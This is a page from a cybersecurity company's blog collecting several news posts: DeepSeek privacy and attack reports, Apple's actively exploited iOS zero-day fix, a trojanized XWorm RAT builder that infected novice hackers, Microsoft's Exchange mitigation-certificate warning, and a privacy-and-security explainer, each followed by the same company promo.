Chinese government regulations may compromise data security and transparency.
Unless DeepSeek addresses its security vulnerabilities and clarifies its data policies, users should approach this AI tool with extreme caution.
If protecting your personal information, browsing habits, and online security is a priority, DeepSeek is best avoided—at least until significant improvements are made.
Apple Fixes First Actively Exploited iOS Zero-Day of 2025
Apple has released security updates addressing multiple vulnerabilities across its mobile and desktop platforms, including a zero-day flaw actively exploited in iOS attacks.
One of the most critical fixes in this update targets CVE-2025-24085, a use-after-free vulnerability in the CoreMedia component. According to Apple’s advisory, this flaw could allow malicious applications to escalate privileges, potentially giving attackers unauthorized access to sensitive data and system resources.
Apple confirmed that the vulnerability has been exploited in the wild against versions of iOS prior to iOS 17.2 but did not disclose specific details regarding the nature of these attacks. The issue was addressed through improved memory management.
Alongside iOS and iPadOS updates, Apple rolled out patches for macOS Sequoia, tvOS, visionOS, and watchOS, all of which were impacted by CVE-2025-24085. However, there is no evidence that this vulnerability has been exploited on platforms other than iOS.
The latest security updates include:
iOS 18.3 and iPadOS 18.3, which fix 29 vulnerabilities, including issues related to authentication bypass, arbitrary code execution, privilege escalation, spoofing, and command injection.
macOS Sequoia 15.3, which patches over 60 vulnerabilities addressing similar security concerns.
macOS Sonoma 14.7.3 and macOS Ventura 13.7.3, which fix over 40 and 30 security flaws, respectively.
tvOS 18.3, watchOS 11.3, and visionOS 2.3, which contain security updates addressing between 17 and 21 vulnerabilities.
Safari 18.3, which includes fixes for seven browser vulnerabilities, including authentication bypass, user interface spoofing, denial-of-service (DoS), and command injection risks.
According to Sylvain Cortes, VP at Hackuity, attackers could exploit the CoreMedia flaw using a malicious app disguised as a media player, granting them access to sensitive data and potentially leading to unauthorized data access, financial loss, and privacy breaches.
Apple users are strongly advised to update their devices immediately to protect against these security threats. For more details, visit Apple’s security updates page.
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
AI platform DeepSeek has confirmed a large-scale malicious attack on its services, disrupting operations and leading to temporary limitations on new user registrations. Despite the attack, existing users can still access the platform, and some new registrations are reportedly going through.
A notice on DeepSeek’s website states:
“Due to large-scale malicious attacks on DeepSeek’s services, registration may be busy. Please wait and try again. Registered users can log in normally. Thank you for your understanding and support.”
Additionally, DeepSeek’s status page indicates ongoing performance degradation. However, the Chinese startup has not provided further details on the nature of the attack, its impact on user data, or potential security risks.
The cyberattack comes at a critical time, as DeepSeek has skyrocketed in popularity, surpassing competitors like ChatGPT on Apple’s App Store and Google Play. The platform also experienced service outages earlier this week, adding to concerns about its stability and security.
Potential Security Risks of AI Platforms
The attack on DeepSeek is not an isolated event. AI platforms and chatbots are becoming prime targets for cybercriminals due to their vast user base and access to sensitive data. Some of the most pressing security risks include:
Data Exposure: Many AI platforms require users to provide personal details, such as names, email addresses, and preferences, which could be compromised in a breach.
Jailbreak Exploits: Researchers have demonstrated that some AI models can be manipulated to generate malicious content, such as ransomware development guides or toxic chemical instructions.
Phishing and Social Engineering Attacks: Cybercriminals can use AI-generated responses to craft highly convincing phishing emails or scams.
API Vulnerabilities: Hackers may exploit APIs that integrate AI models with other services, potentially exposing sensitive user data.
Malware Development: Threat actors can use AI platforms to automate the creation of harmful software, making cyberattacks more efficient and widespread.
How to Protect Yourself When Using AI Platforms
While securing AI platforms is primarily the responsibility of developers, users can take several steps to safeguard their data and minimize risk:
1. Limit Personal Information Sharing
Only provide the bare minimum of personal data required to use an AI service. Avoid linking sensitive accounts, such as primary email addresses or financial accounts, to AI platforms.
2. Strengthen Your Passwords
Ensure that each AI-related account has a unique, strong password. Using a password manager can help keep credentials secure and prevent unauthorized access.
3. Enable Multi-Factor Authentication (MFA)
Whenever possible, enable MFA to add an extra layer of protection. Even if your password is compromised, MFA makes it significantly harder for hackers to gain access.
4. Watch Out for Phishing Attempts
Be cautious of messages claiming to be from AI platforms—especially those urging you to click links or share personal information. Verify messages before taking any action.
5. Regularly Monitor Your Accounts
Check your AI-related accounts for any suspicious activity, such as unauthorized logins or changes in settings. Set up alerts to receive notifications for unusual behavior.
6. Stay Updated on Security Practices
Follow announcements from AI platform developers and cybersecurity researchers to stay informed about emerging threats and best practices for data protection.
7. Understand the Platform’s Privacy Policies
Review the privacy policies of AI platforms before signing up. Ensure they follow industry standards for encryption, data handling, and storage.
8. Avoid Jailbreaking or Exploiting AI Models
Trying to bypass AI model restrictions for unauthorized purposes can expose users to additional security risks. Additionally, such activities may violate terms of service agreements.
9. Use Reputable Security Software
Install and maintain up-to-date antivirus and anti-malware software to protect against potential threats that may arise when interacting with AI-driven applications.
Final Thoughts
As these technologies continue to evolve, so do the threats that target them. By staying informed and following best cybersecurity practices, users can reduce their risk and help ensure safer interactions with AI-powered tools.
As AI becomes more integrated into daily life, security should remain a top priority—not just for developers but for every individual using these platforms.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
In the digital era, privacy and cybersecurity are often discussed in tandem, but their interplay is far more nuanced than it appears. For IT professionals, understanding the symbiotic relationship between these two domains is critical to designing secure systems, ensuring compliance, and fostering trust in digital ecosystems. While privacy focuses on the ethical and legal handling of personal data, cybersecurity provides the technical mechanisms to enforce those principles. Together, they form the foundation of a resilient and trustworthy digital infrastructure.
What Is Data Privacy in a Technical Context?
Privacy, at its core, is about ensuring individuals retain control over their personal information. For IT professionals, this translates into implementing systems and processes that adhere to privacy-by-design principles. Personal data can include:
Personally Identifiable Information (PII): Names, Social Security numbers, email addresses, etc.
Behavioral Data: Browsing history, geolocation, and transaction patterns.
Sensitive Data: Health records, financial information, and biometric data.
In a technical context, privacy is not just about limiting access but also about ensuring data is collected, processed, and stored in compliance with regulations like the General Data Protection Regulation (GDPR), California Consumer Privacy Act (CCPA), and Health Insurance Portability and Accountability Act (HIPAA).
How Privacy and Cybersecurity Intersect
While privacy defines the “what” and “why” of data protection, cybersecurity addresses the “how.” Here’s how they intersect:
Data Minimization and Access Control:
Privacy dictates that only the minimum necessary data should be collected and retained.
Cybersecurity enforces this through role-based access control (RBAC), least privilege principles, and data loss prevention (DLP) tools.
Encryption and Anonymization:
Privacy regulations often mandate encryption and anonymization of sensitive data.
Cybersecurity implements AES-256 encryption, TLS protocols, and tokenization to ensure data remains secure both at rest and in transit.
Incident Response and Breach Notification:
Privacy laws require timely notification of data breaches.
Cybersecurity teams use Security Information and Event Management (SIEM) systems and incident response frameworks to detect, contain, and report breaches.
Third-Party Risk Management:
Privacy concerns extend to third-party vendors who process data.
Cybersecurity teams conduct vendor risk assessments and enforce zero-trust architectures to mitigate supply chain risks.
Why Privacy Matters in Cybersecurity for IT Professionals
For IT professionals, privacy is not just a compliance checkbox—it’s a strategic imperative. Here’s why:
Regulatory Compliance:
Non-compliance with privacy regulations can result in hefty fines and reputational damage. IT teams must ensure systems are designed to meet legal requirements, such as GDPR’s right to be forgotten or CCPA’s data subject access requests (DSARs).
Data Integrity and Trust:
Privacy breaches erode user trust. IT professionals must implement data integrity checks and audit trails to ensure data is accurate and tamper-proof.
Attack Surface Reduction:
By minimizing data collection and retention, IT teams reduce the attack surface. Less data means fewer targets for cybercriminals.
Ethical Responsibility:
IT professionals have a duty to protect user data. Privacy breaches can have real-world consequences, such as identity theft or financial fraud.
How Cybersecurity Enhances Privacy: A Technical Perspective
Cybersecurity is the backbone of privacy. Here’s how IT professionals can leverage cybersecurity tools and practices to uphold privacy:
Data Encryption:
Use end-to-end encryption (E2EE) for communications and homomorphic encryption for secure data processing.
Implement key management systems (KMS) to securely store and rotate encryption keys.
Access Control and Authentication:
Deploy multi-factor authentication (MFA) and single sign-on (SSO) solutions to verify user identities.
Use attribute-based access control (ABAC) for fine-grained permissions.
Threat Detection and Prevention:
Employ intrusion detection systems (IDS) and intrusion prevention systems (IPS) to monitor network traffic.
Use machine learning (ML) and artificial intelligence (AI) to detect anomalies and predict potential breaches.
Data Masking and Tokenization:
Replace sensitive data with tokens or masked values in non-production environments to prevent exposure.
Zero-Trust Architecture:
Adopt a zero-trust model to ensure no user or device is trusted by default, even within the network perimeter.
Practical Steps for IT Professionals to Strengthen Privacy and Cybersecurity
Conduct a Data Privacy Impact Assessment (DPIA):
Identify and mitigate risks associated with data processing activities. Use frameworks like NIST Privacy Framework to guide your assessment.
Implement Privacy-Enhancing Technologies (PETs):
Leverage tools like differential privacy, secure multi-party computation (SMPC), and confidential computing to protect data while enabling analysis.
Centralize Security Operations:
Use SIEM platforms like Splunk or IBM QRadar to centralize logging, monitoring, and incident response.
Integrate privacy management platforms to automate compliance tasks.
Train Employees on Privacy and Security:
Conduct regular training sessions on phishing awareness, data handling best practices, and incident response protocols.
Adopt a DevSecOps Approach:
Embed privacy and security into the software development lifecycle (SDLC). Use tools like OWASP ZAP and SAST/DAST scanners to identify vulnerabilities early.
Monitor and Audit Continuously:
Regularly audit access logs, encryption practices, and third-party integrations. Use automated compliance tools to streamline audits.
Why Privacy and Cybersecurity Must Work Together
For IT professionals, the convergence of privacy and cybersecurity is non-negotiable. Privacy ensures that data is handled ethically and legally, while cybersecurity provides the technical safeguards to enforce those principles. Together, they:
Build Trust: Customers and stakeholders trust organizations that prioritize both privacy and security.
Reduce Risk: A combined approach minimizes the likelihood of breaches and regulatory penalties.
Enable Innovation: Secure and privacy-compliant systems pave the way for innovative technologies like AI, IoT, and cloud computing.
The Bottom Line
Privacy and cybersecurity are not just complementary—they are interdependent. For IT professionals, mastering the intersection of these domains is essential to building resilient systems, ensuring compliance, and fostering trust in an increasingly digital world. By adopting a holistic approach that integrates privacy-by-design and robust cybersecurity practices, IT teams can safeguard sensitive data and drive organizational success.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
18,000 Script Kiddies Fall Victim to Trojanized Malware Builder
Exchange Server Warning: Certificate Deprecation Leaves Older Systems Exposed
How can Netizen help?
18,000 Script Kiddies Fall Victim to Trojanized Malware Builder
A threat actor has exploited low-skilled hackers, commonly known as “script kiddies,” by distributing a fake malware builder that installs a backdoor to compromise their devices. Security researchers at CloudSEK report that the campaign infected 18,459 devices across the globe, with significant activity in Russia, the United States, India, Ukraine, and Turkey.
The attack revolves around a trojanized version of the XWorm Remote Access Trojan (RAT) builder. Promoted as a free tool for generating XWorm malware, the fake builder was shared on platforms like GitHub, Telegram, file-sharing websites, and YouTube tutorials. These sources targeted inexperienced cybercriminals seeking free hacking tools, demonstrating yet again that there is no honor among thieves.
Rather than providing a working RAT builder, the fake tool covertly installs malware on the attacker’s device. According to CloudSEK, the malicious campaign is specifically designed to exploit the lack of technical expertise among script kiddies.
Once installed, the malware embeds itself persistently on the victim’s system by modifying the Windows Registry. It registers each infected device with a Telegram-based command-and-control (C2) server, utilizing a hardcoded Telegram bot ID and token for communication.
The malware’s capabilities include:
Data Theft: Stealing saved passwords, cookies, and autofill data from web browsers.
Keylogging: Recording keystrokes for credential harvesting.
Screen Capture: Capturing screenshots of the infected desktop.
Ransomware Functionality: Encrypting system files with a provided password.
Process Termination: Killing security processes or other specified tasks.
File Exfiltration: Uploading specific files from the infected system.
Self-Uninstallation: The ability to remove itself upon receiving a command.
CloudSEK’s investigation found that approximately 11% of infected devices had their data exfiltrated, including screenshots and stolen browser information.
The malware primarily targets devices in Brazil (65%), followed by smaller shares in Turkey, Argentina, Uzbekistan, Pakistan, and Iraq. The malicious actors leveraged a diverse array of ASN providers and IP addresses, indicating an effort to obscure their origin and avoid detection.
CloudSEK researchers disrupted the botnet using its own infrastructure against it. By leveraging the malware’s hardcoded API tokens and a built-in kill switch, they issued mass uninstall commands to the infected devices.
To reach as many victims as possible, the researchers:
Extracted known machine IDs from Telegram logs.
Brute-forced machine IDs within a numeric range.
Used the Telegram API to send the self-removal command to all infected clients.
While this method successfully removed the malware from numerous devices, some systems remain compromised due to limitations like offline devices and Telegram’s rate-limiting policies.
Exchange Server Warning: Certificate Deprecation Leaves Older Systems Exposed
Microsoft has issued a warning that outdated Exchange servers are no longer able to receive critical emergency mitigation definitions due to the deprecation of an Office Configuration Service (OCS) certificate type. The inability to download these mitigations leaves on-premises Exchange servers vulnerable to high-risk exploits, emphasizing the importance of timely updates.
The Exchange Emergency Mitigation Service (EEMS), introduced in September 2021, provides automated, interim security mitigations for actively exploited vulnerabilities. This service is designed to protect Exchange Server 2016 and 2019 installations by detecting known threats and applying mitigations until official security patches are available.
EEMS operates as a Windows service installed automatically on Exchange servers running the Mailbox role, provided they have deployed the September 2021 or later cumulative updates.
Microsoft’s Exchange Team has confirmed that servers running Exchange versions older than March 2023 are unable to connect to the Office Configuration Service (OCS) and download new mitigations. These outdated systems instead generate errors marked as “MSExchange Mitigation Service.”
The issue stems from the deprecation of an older certificate type used by OCS. While a new certificate has been deployed to address this, only servers updated with cumulative or security updates (CU or SU) newer than March 2023 can utilize the updated certificate and continue receiving emergency mitigations.
Microsoft is urging organizations to update their Exchange servers as soon as possible. Keeping servers up to date ensures they remain protected against new and emerging threats while retaining the ability to download and apply EEMS mitigations.
“It is critical to always keep your servers up to date,” said the Exchange Team. “Running the Exchange Server Health Checker will provide guidance on what actions are needed to secure your environment and re-enable EEMS.”
The EEMS feature was developed in response to attacks like ProxyLogon and ProxyShell, which were exploited in early 2021 by both state-sponsored and financially motivated threat actors before patches were available.
In March 2021, Microsoft observed at least ten hacking groups, including the Chinese state-backed group Hafnium, leveraging ProxyLogon zero-days to breach Exchange servers. The lack of timely mitigations highlighted the need for automated, interim solutions like EEMS.
To ensure Exchange servers remain secure and functional:
Apply Updates Regularly: Always deploy the latest cumulative and security updates to maintain compatibility with EEMS and other protective measures.
Run Health Checks: Use the Exchange Server Health Checker to identify outdated configurations and apply recommended fixes.
Monitor Vulnerabilities: Stay informed about newly discovered exploits and ensure timely patch deployment to mitigate risks.
Organizations relying on on-premises Exchange servers must prioritize regular updates to protect their email workloads from high-risk vulnerabilities. Failure to do so may leave systems exposed to exploits, disrupt automated security mitigations, and compromise critical data.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Netizen Blog and News 
You must be logged in to post a comment.